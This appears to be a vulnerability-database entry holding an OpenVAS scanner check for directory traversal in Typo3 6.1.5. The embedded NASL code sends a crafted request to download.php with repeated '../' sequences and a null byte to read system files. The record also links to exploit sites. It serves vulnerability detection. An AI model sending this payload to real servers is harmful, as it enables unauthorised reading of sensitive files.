This host is running Typo3 and is prone to multiple directory traversal
vulnerabilities.
{"id": "OPENVAS:1361412562310803776", "type": "openvas", "bulletinFamily": "scanner", "title": "Typo3 Multiple Directory Traversal Vulnerabilities", "description": "This host is running Typo3 and is prone to multiple directory traversal\nvulnerabilities.", "published": "2013-11-20T00:00:00", "modified": "2018-09-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803776", "reporter": "Copyright (C) 2013 Greenbone Networks GmbH", "references": ["http://www.exploit-db.com/exploits/29355", "http://exploitsdownload.com/exploit/php/typo3-directory-traversal-vulnerability"], "cvelist": [], "lastseen": "2018-09-17T13:38:52", "viewCount": 2, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "pluginID": "1361412562310803776", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_typo3_multiple_dir_trav_vuln.nasl 11401 2018-09-15 08:45:50Z cfischer $\n#\n# Typo3 Multiple Directory Traversal Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:typo3:typo3\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803776\");\n script_version(\"$Revision: 11401 $\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-15 10:45:50 +0200 (Sat, 15 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-20 11:33:55 +0530 (Wed, 20 Nov 2013)\");\n script_name(\"Typo3 Multiple Directory Traversal Vulnerabilities\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation may allow an attacker to obtain sensitive information,\nwhich can lead to launching further attacks.\");\n script_tag(name:\"affected\", value:\"Typo3 version 6.1.5 and probably before.\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to improper validation of user-supplied input via\n'file' and 'path' parameters, which allows attackers to read arbitrary files\nvia a ../(dot dot) sequences.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted exploit string via HTTP GET request and check whether it\nis able to read the system file or not.\");\n script_tag(name:\"summary\", value:\"This host is running Typo3 and is prone to multiple directory traversal\nvulnerabilities.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/29355\");\n script_xref(name:\"URL\", value:\"http://exploitsdownload.com/exploit/php/typo3-directory-traversal-vulnerability\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_typo3_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"TYPO3/installed\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nfiles = traversal_files();\n\nforeach file (keys(files))\n{\n url = dir + \"/fileadmin/scripts/download.php?path=\" +\n crap(data:\"../\", length:3*15) + files[file] + \"%00\";\n\n if(http_vuln_check(port:port, url:url, pattern:file))\n {\n security_message(port:port);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647321575, "score": 1659775931}}
Typo3 Multiple Directory Traversal Vulnerabilities